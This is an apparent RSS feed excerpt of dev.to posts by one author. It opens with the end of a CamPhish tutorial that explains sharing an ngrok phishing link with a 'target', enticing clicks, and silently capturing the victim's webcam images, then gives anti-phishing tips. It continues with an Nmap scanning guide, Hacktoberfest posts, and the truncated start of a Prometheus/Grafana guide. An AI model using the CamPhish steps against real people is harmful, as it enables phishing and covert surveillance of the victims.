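id="${url#*watch?v=}"   # -> "UyQm4O9G7OM&list="
id="${id%%&*}"          # -> "UyQm4O9G7OM"
echo "$id"              # prints UyQm4O9G7OM
```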

&lt;p&gt;Visit the &lt;a href="https://ngrok.com"&gt;&lt;strong&gt;ngrok&lt;/strong&gt;&lt;/a&gt; website, create an account, and navigate to the dashboard. Once there, go to “Authtoken,” copy the token, and paste it into the terminal as shown in the image below.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--Hdu1jysd--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AyHBQDO3bph-g9M8LgGMmkw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--Hdu1jysd--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AyHBQDO3bph-g9M8LgGMmkw.png" alt="" width="800" height="428"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;ngrok AuthToken&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--MQMKo6Q7--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A9SlNZA3AGICjhAteJZLWnA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--MQMKo6Q7--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A9SlNZA3AGICjhAteJZLWnA.png" alt="" width="800" height="428"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Token ID&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Following this, it will initiate a PHP server and an Ngrok server. You will receive a link that you can then share with your target. To succeed in this, you’ll require social engineering skills to entice clicks on your provided link.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--pWSViwFQ--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A2ufy7blH0TwA6TT1shnmRA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--pWSViwFQ--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A2ufy7blH0TwA6TT1shnmRA.png" alt="" width="800" height="428"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Once the victim clicks the provided direct link, they are taken to a YouTube page playing the selected song. Simultaneously, the phishing page silently requests the camera, and as shown in the screenshot below, I obtained images of the victim, saved in my CamPhish folder.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--3xS3Pqei--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2ArW9Dm5cua3vzUqgMUIBMpg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--3xS3Pqei--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2ArW9Dm5cua3vzUqgMUIBMpg.png" alt="" width="800" height="353"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Images&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Note
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;Install Ngrok directly from the official site instead of using the initially downloaded inbuilt Ngrok. Upon running CamPhish for the first time, delete the existing Ngrok files. Download the executable file from the official Ngrok site and move it to the CamPhish folder. This step is necessary due to issues with the inbuilt Ngrok, ensuring the proper functioning of the tool.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;See how simple it is to compromise someone’s camera? Stay vigilant against cybercrime and scams, and make sure to educate your parents and friends about these threats. This knowledge will help safeguard them from falling victim to cyber-attacks, especially since older and non-technical individuals are often targeted.&lt;/p&gt;

&lt;h3&gt;
  
  
  Safety and tips:
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Be Skeptical of Unsolicited Communications:&lt;/strong&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Be cautious of unexpected emails, messages, or social media requests, especially if they contain urgent or alarming messages.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Sender Information:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Double-check the sender’s email address or contact details. Legitimate organizations usually have official and recognizable communication channels.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;3. Don’t Click on Suspicious Links:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Avoid clicking on links in emails or messages from unknown sources. Hover over links to preview the URL before clicking.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;4. Use Two-Factor Authentication (2FA):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Enable 2FA whenever possible to add an extra layer of security to your accounts.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;5. Keep Software and Systems Updated:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Regularly update your operating system, antivirus software, and other applications to patch vulnerabilities.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;6. Educate Yourself and Others:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Stay informed about common phishing tactics and educate friends and family members to recognize and avoid potential threats.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;7. Use Reliable Security Software:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Install and regularly update reputable antivirus and anti-malware software to detect and block phishing attempts.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;8. Be Wary of Requests for Personal Information:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Avoid sharing sensitive information such as passwords, credit card details, or social security numbers through email or unfamiliar websites.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;9. Check Website Security:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Before entering personal information on a website, ensure the site is secure. Look for “https://” in the URL and check for a padlock symbol.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;10. Trust Your Instincts:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;If something feels off or too good to be true, it probably is. Trust your instincts and proceed with caution.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;By following these tips, you can significantly reduce the risk of falling victim to phishing attempts and enhance your overall online security.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>hacking</category>
      <category>security</category>
    </item>
    <item>
      <title>Mastering Nmap: Essential Commands and Examples for Network Security</title>
      <dc:creator>Kamalesh-Seervi</dc:creator>
      <pubDate>Sun, 05 Nov 2023 06:51:33 +0000</pubDate>
      <link>https://dev.to/kamaleshseervi/mastering-nmap-essential-commands-and-examples-for-network-security-2128</link>
      <guid>https://dev.to/kamaleshseervi/mastering-nmap-essential-commands-and-examples-for-network-security-2128</guid>
      <description>&lt;p&gt;Discover the Power of Nmap Scanning and Enumeration Techniques to Strengthen Your Network Defense&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s---9yhZY3H--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/540/1%2AMvmx0GkCTkCR-qN_zj96vg.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s---9yhZY3H--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/540/1%2AMvmx0GkCTkCR-qN_zj96vg.jpeg" alt="" width="540" height="245"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  What is Nmap?
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;Nmap stands for Network Mapper and is a network scanning and host detection tool that is very useful during several steps of penetration testing.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Nmap is open source and can be used to:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Detect the live host on the network (host discovery)&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Detect the open ports on the host (port discovery or enumeration)&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Detect the software and the version to the respective port (service discovery)&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Detect the operating system, hardware address, and the software version&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Detect the vulnerability and security holes (Nmap scripts)&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Nmap Syntax:
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nmap [scan type] [options] [target specification]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Nmap Scan types:
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;TCP SCAN&lt;/li&gt;
&lt;li&gt;UDP SCAN&lt;/li&gt;
&lt;li&gt;SYN SCAN&lt;/li&gt;
&lt;li&gt;ACK SCAN&lt;/li&gt;
&lt;li&gt;FIN SCAN&lt;/li&gt;
&lt;li&gt;NULL SCAN&lt;/li&gt;
&lt;li&gt;XMAS SCAN&lt;/li&gt;
&lt;li&gt;RPC SCAN&lt;/li&gt;
&lt;li&gt;IDLE SCAN&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Before delving into advanced Nmap concepts, let’s first explore the fundamentals of NSlookup. NSlookup is a command-line tool used to query DNS servers and retrieve information about domain names. To illustrate, consider the following example:&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;NSlookup&lt;/strong&gt; is a command-line tool for querying DNS servers to retrieve information about domain names, such as their associated IP addresses.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Example:&lt;/strong&gt; To find the IP address of a domain, you can use NSlookup like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nslookup google.com
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--bc2K1Vl8--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2ApvBSrkdEJUTigID0p6yXFQ.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--bc2K1Vl8--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2ApvBSrkdEJUTigID0p6yXFQ.png" alt="" width="800" height="570"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;O/P&lt;/em&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Following our exploration of NSlookup, we’ll now transition to Nmap, an advanced network scanning tool. We’ll begin by discussing Nmap’s core concepts and provide an example to illustrate its functionality.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Nmap — Advanced Scanning (Best practices)
&lt;/h3&gt;

&lt;h4&gt;
  
  
  1. Scanning and Logging Network Data with Nmap
&lt;/h4&gt;

&lt;p&gt;In the provided Nmap command, several options and parameters are used to perform a network scan and save the results:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;nmap: This is the command itself, invoking the Nmap tool.&lt;/li&gt;
&lt;li&gt;-oG -: This option instructs Nmap to generate output in the "grepable" format and sends it to the standard output (stdout).&lt;/li&gt;
&lt;li&gt;192.168.29.238: This is the target IP address (or hostname) you want to scan. Nmap will perform its scanning and testing on this target.&lt;/li&gt;
&lt;li&gt;-vv: The -v option stands for "verbose." Using it twice (-vv) increases the verbosity level, providing more detailed information during the scan.&lt;/li&gt;
&lt;li&gt;&amp;gt; Desktop/results: The &amp;gt; symbol is used to redirect the output of the Nmap command to a file named "results" on the desktop. This will create a file containing the scan results in the current user's Desktop directory.
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nmap -oG - &amp;lt;ip&amp;gt; -vv &amp;gt; Desktop/results
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--bfbchGfL--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AxJFd1ueXRtivLPvZ4Gcrxw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--bfbchGfL--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AxJFd1ueXRtivLPvZ4Gcrxw.png" alt="" width="800" height="813"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;O/P&lt;/em&gt;&lt;/p&gt;
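&lt;p&gt;The grepable format pays off when you post-process the results file. The sketch below runs against a single hypothetical -oG line; on a real run you would feed it the Desktop/results file instead:&lt;/p&gt;

```shell
#!/bin/sh
# One hypothetical line of "grepable" (-oG) output; for a real scan use:
#   grep 'Ports:' Desktop/results
line='Host: 192.168.29.238 ()  Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/closed/tcp//https///'

# Keep only ports reported as open, printing one port number per line
printf '%s\n' "$line" | grep -oE '[0-9]+/open' | cut -d/ -f1
```

&lt;p&gt;Here the closed 443 entry is filtered out and only 22 and 80 survive.&lt;/p&gt;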

&lt;h4&gt;
  
  
  2. Scanning Particular Ports with Nmap
&lt;/h4&gt;

&lt;p&gt;This Nmap command is designed to perform an extensive network scan targeting a range of IP addresses and specifically focusing on particular port services:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;nmap: This is the Nmap command to initiate network scanning.&lt;/li&gt;
&lt;li&gt;-oG -: The -oG option instructs Nmap to generate output in the "grepable" format, while the hyphen - indicates that the output should be sent to the standard output (stdout).&lt;/li&gt;
&lt;li&gt;192.168.29.0-255: This specifies a range of IP addresses from 192.168.29.0 to 192.168.29.255. The scan will be conducted on all IP addresses within this range.&lt;/li&gt;
&lt;li&gt;-p 22: The -p option is used to specify the port number to scan, and in this case, it's set to 22. Port 22 is the default port for SSH (Secure Shell), a protocol used for secure remote access to systems.&lt;/li&gt;
&lt;li&gt;-vv: The -v option is for "verbose" mode, and using it twice (-vv) increases the verbosity, providing detailed information during the scan.&lt;/li&gt;
&lt;li&gt;&amp;gt; Desktop/results: The &amp;gt; symbol is used to redirect the output of the Nmap command to a file named "results" on the desktop.
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt; nmap -oG - &amp;lt;ip&amp;gt;-&amp;lt;range&amp;gt; -p 22 -vv &amp;gt; Desktop/results
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--dL-zbgiI--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AL-mH5sEd9Om23ZHXtS9OCA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--dL-zbgiI--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AL-mH5sEd9Om23ZHXtS9OCA.png" alt="" width="800" height="269"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;O/P&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Nmap — Aggressive Scanning
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;This Nmap command performs an “Aggressive” scan on the target “scanme.nmap.org.” The -A option in the command instructs Nmap to enable version detection, script scanning, and traceroute to provide a more detailed and comprehensive assessment of the target system. "scanme.nmap.org" is a service provided by Nmap that allows users to test their Nmap scanning skills on a safe and controlled target. The result of this scan will include information about open ports, services, operating system details, and potential vulnerabilities, making it an extensive reconnaissance effort.
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nmap -A scanme.nmap.org
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s---h7PPnBW--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AGGJ8gMlGFnqSto757XZ1UQ.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s---h7PPnBW--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AGGJ8gMlGFnqSto757XZ1UQ.png" alt="" width="800" height="484"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;-A (aggressive scan)&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2.&lt;/strong&gt; The Nmap command below performs a version detection scan on the target "scanme.nmap.org." Here's an explanation of the command:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;-sV: The -sV option is used to enable version detection during the scan. When this option is included, Nmap attempts to determine the version of the services running on the target by analyzing their responses to various probes. This can help identify not only the service but also the specific version of the service (e.g., Apache 2.4.7).
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nmap -sV scanme.nmap.org
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--3lhRvnfb--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AZAV8uladB_JeeIQnrPMgYA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--3lhRvnfb--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AZAV8uladB_JeeIQnrPMgYA.png" alt="" width="800" height="338"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;-sV (Services)&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3.&lt;/strong&gt; The Nmap command below performs a fast scan on the target "scanme.nmap.org." Here's an explanation of the command:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;-F: The -F option is shorthand for "fast" scan mode. When you use this option, Nmap scans only the 100 most common ports (instead of the default 1,000) and identifies their associated services, which makes the scan considerably quicker than a comprehensive one.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nmap -F scanme.nmap.org
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--XmCL0xWY--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AnjXj1kivl-rYDudQnATVfQ.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--XmCL0xWY--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AnjXj1kivl-rYDudQnATVfQ.png" alt="" width="800" height="338"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;-F (fast mode)&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4.&lt;/strong&gt; The Nmap command below scans the target "&lt;a href="http://www.google.com/"&gt;www.google.com&lt;/a&gt;" while displaying only the open ports. Here's an explanation of the command:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;--open: The --open option instructs Nmap to display only the open ports and services discovered during the scan. This means that it will filter out closed or filtered ports from the scan results, providing a concise list of the open ports that are actively accepting connections.&lt;/li&gt;
&lt;li&gt;
&lt;a href="http://www.google.com/"&gt;www.google.com&lt;/a&gt;: This is the target hostname or domain name, in this case, "&lt;a href="http://www.google.com/"&gt;www.google.com&lt;/a&gt;." The scan is performed on Google's web servers.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nmap --open www.google.com
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--qDWcNMAN--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AvX7MIDshEG4xXUsdVb7SNw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--qDWcNMAN--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AvX7MIDshEG4xXUsdVb7SNw.png" alt="" width="800" height="300"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;--open (shows open ports)&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Resources:
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://nmap.org/download.html"&gt;Download the Free Nmap Security Scanner for Linux/Mac/Windows&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://hackersploit.org/"&gt;HackerSploit Blog&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>pentesting</category>
      <category>hacking</category>
      <category>security</category>
      <category>cybersecurity</category>
    </item>
    <item>
      <title>Hacktoberfest 2023 Pledge</title>
      <dc:creator>Kamalesh-Seervi</dc:creator>
      <pubDate>Wed, 25 Oct 2023 14:57:22 +0000</pubDate>
      <link>https://dev.to/kamaleshseervi/hacktoberfest-2023-pledge-a2a</link>
      <guid>https://dev.to/kamaleshseervi/hacktoberfest-2023-pledge-a2a</guid>
      <description>&lt;p&gt;Officially registered for #Hacktoberfest2023!&lt;/p&gt;

&lt;p&gt;Looking forward to discovering awesome repositories and contributing new features and fixes.&lt;/p&gt;

&lt;p&gt;Tags: &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;webdev&lt;/li&gt;
&lt;li&gt;beginners&lt;/li&gt;
&lt;li&gt;opensource&lt;/li&gt;
&lt;li&gt;hacktoberfest23&lt;/li&gt;
&lt;li&gt;Hacktoberfest2023&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>hacktoberfest23</category>
    </item>
    <item>
      <title>Hacktoberfest2023</title>
      <dc:creator>Kamalesh-Seervi</dc:creator>
      <pubDate>Wed, 25 Oct 2023 14:54:29 +0000</pubDate>
      <link>https://dev.to/kamaleshseervi/placeholder-contributor-10jn</link>
      <guid>https://dev.to/kamaleshseervi/placeholder-contributor-10jn</guid>
      <description>&lt;h2&gt;
  
  
  Intro
&lt;/h2&gt;

&lt;p&gt;Hello, I'm Kamalesh Seervi, and I'm excited to share my experience with Hacktoberfest 2023. This is my first Hacktoberfest, and I'm glad I finally took part. You can find my contributions on my &lt;a href="https://github.com/kamalesh-seervi"&gt;GitHub profile&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Highs and Lows
&lt;/h2&gt;

&lt;p&gt;This Hacktoberfest had its fair share of highs and lows. One of the biggest accomplishments for me was successfully contributing to an open-source project that I've been following for a long time. It was a light-bulb moment because I had always thought contributing to this project was beyond my capabilities, but with determination and guidance from the project maintainers, I was able to make meaningful contributions.&lt;/p&gt;

&lt;p&gt;However, there were also some challenges during the month. I encountered a complex issue in one of the projects I was contributing to. It seemed impossible to fix at first, and I was frustrated. But instead of giving up, I decided to reach out to the project's community for help. This experience taught me the importance of seeking assistance and collaborating with others in the open-source community. Eventually, we solved the issue together, which was a valuable learning experience.&lt;/p&gt;

&lt;h2&gt;
  
  
  Growth
&lt;/h2&gt;

&lt;p&gt;Before Hacktoberfest 2023, my skillset was primarily centered around web development and a bit of scripting. However, during this month, I expanded my knowledge and skills. I delved into the world of open-source contributions, which included working on projects in various programming languages, like Python, JavaScript, and even C++. I improved my understanding of version control systems, code review processes, and collaborating with a diverse group of developers.&lt;/p&gt;

&lt;p&gt;My learning and career goals have evolved as well. I've realized the importance of giving back to the open-source community, and I plan to continue contributing to projects that align with my interests. This experience has opened up new opportunities for me, and I'm considering a shift towards a more open-source-centric career path. Hacktoberfest 2023 has been a transformative journey, and I'm looking forward to the continued growth and learning that open source has to offer.&lt;/p&gt;

</description>
      <category>hack23contributor</category>
    </item>
    <item>
      <title>Setting up Prometheus and Grafana Integration on Kubernetes with Helm</title>
      <dc:creator>Kamalesh-Seervi</dc:creator>
      <pubDate>Sun, 22 Oct 2023 15:45:45 +0000</pubDate>
      <link>https://dev.to/kamaleshseervi/setting-up-prometheus-and-grafana-integration-on-kubernetes-with-helm-4p5o</link>
      <guid>https://dev.to/kamaleshseervi/setting-up-prometheus-and-grafana-integration-on-kubernetes-with-helm-4p5o</guid>
      <description>&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--_xIuUbSX--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A7UZ2JxZaYH7xxZGTWoQ4eQ.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--_xIuUbSX--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A7UZ2JxZaYH7xxZGTWoQ4eQ.png" alt="" width="800" height="420"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;In this comprehensive guide, you will gain insight into the process of seamlessly integrating Prometheus and Grafana within your Kubernetes environment using Helm. Furthermore, you’ll discover how to construct a straightforward dashboard in Grafana. Prometheus and Grafana stand as two highly favored open-source monitoring solutions for Kubernetes.&lt;/p&gt;

&lt;p&gt;Acquiring the skill to deploy them via Helm empowers you to efficiently oversee your Kubernetes cluster and swiftly resolve issues. This proficiency will also deepen your comprehension of your cluster’s overall health and performance, allowing you to diligently monitor resource allocation and performance metrics in your Kubernetes environment.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h4&gt;
  
  
  Prerequisites
&lt;/h4&gt;

&lt;p&gt;To get started with this guide, make sure you have the following prerequisites:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Docker Installation:&lt;/strong&gt; Follow the official Docker documentation to install Docker on your machine.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Kubectl Installation:&lt;/strong&gt; Install Kubectl on your local machine for communication with your Kubernetes cluster. Refer to the official Kubectl documentation for guidance.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Basic Kubernetes Knowledge:&lt;/strong&gt; It’s helpful to have some fundamental knowledge of Kubernetes. You can either consult the Kubernetes official documentation or access Semaphore’s free ebook titled “CI/CD with Docker and Kubernetes,” which doesn’t require prior Docker or Kubernetes expertise.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Kubernetes Cluster Setup:&lt;/strong&gt; You’ll be deploying Prometheus and Grafana on your Kubernetes cluster. In this guide, we’ll use Minikube, a free local Kubernetes cluster. Alternatively, you can opt for managed cloud-based Kubernetes services such as Google Kubernetes Engine (GKE), Azure Kubernetes Service (AKS), Amazon Elastic Kubernetes Service (EKS), or DigitalOcean Kubernetes Service (DOKS). Keep in mind that some of these cloud-based services may involve a cost, while others offer free plans.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;By meeting these prerequisites, you’ll be ready to integrate Prometheus and Grafana seamlessly into your Kubernetes environment.&lt;/p&gt;

&lt;h4&gt;
  
  
  What is Prometheus?
&lt;/h4&gt;

&lt;p&gt;Prometheus stands as an open-source DevOps utility, offering robust monitoring and real-time alerting features tailor-made for container orchestration platforms like Kubernetes. This tool excels in collecting and storing metrics as time series data, making it an ideal choice for tracking and analyzing platform performance. One of its standout attributes is its innate ability to monitor the container orchestration platform, making it an invaluable data source for various data visualization libraries, including Grafana.&lt;/p&gt;

&lt;p&gt;The metrics Prometheus captures from the Kubernetes cluster encompass:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Health status of the Kubernetes cluster.&lt;/li&gt;
&lt;li&gt;CPU utilization statistics.&lt;/li&gt;
&lt;li&gt;Memory consumption metrics.&lt;/li&gt;
&lt;li&gt;Node status within the Kubernetes infrastructure.&lt;/li&gt;
&lt;li&gt;Insights into potential performance bottlenecks.&lt;/li&gt;
